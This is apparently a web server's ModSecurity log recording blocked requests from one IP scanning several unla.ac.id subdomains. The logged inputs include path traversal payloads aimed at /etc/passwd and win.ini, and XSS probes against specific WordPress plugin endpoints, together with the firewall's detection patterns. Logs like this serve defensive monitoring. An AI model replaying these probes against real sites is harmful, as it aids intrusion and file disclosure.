[Tue Aug 29 11:54:46.639879 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqUB4IAAAAb"]
[Tue Aug 29 11:54:46.659396 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqY57EAAAAr"]
[Tue Aug 29 11:54:46.659503 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqWwY4AAAAl"]
[Tue Aug 29 11:54:47.596726 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqY57IAAAAr"]
[Tue Aug 29 11:54:47.597584 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApbUW0AAAAh"]
[Tue Aug 29 11:54:47.618288 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqZubQAAAAs"]
[Tue Aug 29 11:54:47.620917 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApk-YQAAAAn"]
[Tue Aug 29 11:54:47.630233 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16F8Co-f0AAAqdboMAAAAw"]
[Tue Aug 29 11:54:47.673436 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqhN94AAAAE"]
[Tue Aug 29 11:54:48.611506 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16GMCo-f0AAAqQ@wUAAAAB"]
[Tue Aug 29 11:54:50.549179 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqSwk8AAAAN"]
[Tue Aug 29 11:54:50.554872 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqRzEkAAAAM"]
[Tue Aug 29 11:54:50.558615 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqhN@kAAAAE"]
[Tue Aug 29 11:54:50.559394 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApa-HkAAAAg"]
[Tue Aug 29 11:54:50.580902 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqTvlkAAAAa"]
[Tue Aug 29 11:54:50.586248 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqhN@oAAAAE"]
[Tue Aug 29 11:54:50.597168 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqXyR8AAAAq"]
[Tue Aug 29 11:54:50.608077 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqRzEsAAAAM"]
[Tue Aug 29 11:54:50.613648 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApbUXoAAAAh"]
[Tue Aug 29 11:54:50.644713 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAo2nEEAAAAA"]
[Tue Aug 29 11:54:50.653260 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApbUXsAAAAh"]
[Tue Aug 29 11:54:50.656901 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApXghUAAAAU"]
[Tue Aug 29 11:54:50.682108 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApXghYAAAAU"]
[Tue Aug 29 11:54:50.704335 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqSwlQAAAAN"]
[Tue Aug 29 11:54:51.548986 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqUB5gAAAAb"]
[Tue Aug 29 11:54:51.632483 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16G8Co-f0AAApk-ZAAAAAn"]
[Tue Aug 29 11:54:51.632579 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAAoz79gAAAAS"]
[Tue Aug 29 11:54:51.763015 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqWwaIAAAAl"]
[Tue Aug 29 11:54:52.555131 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqWwaMAAAAl"]
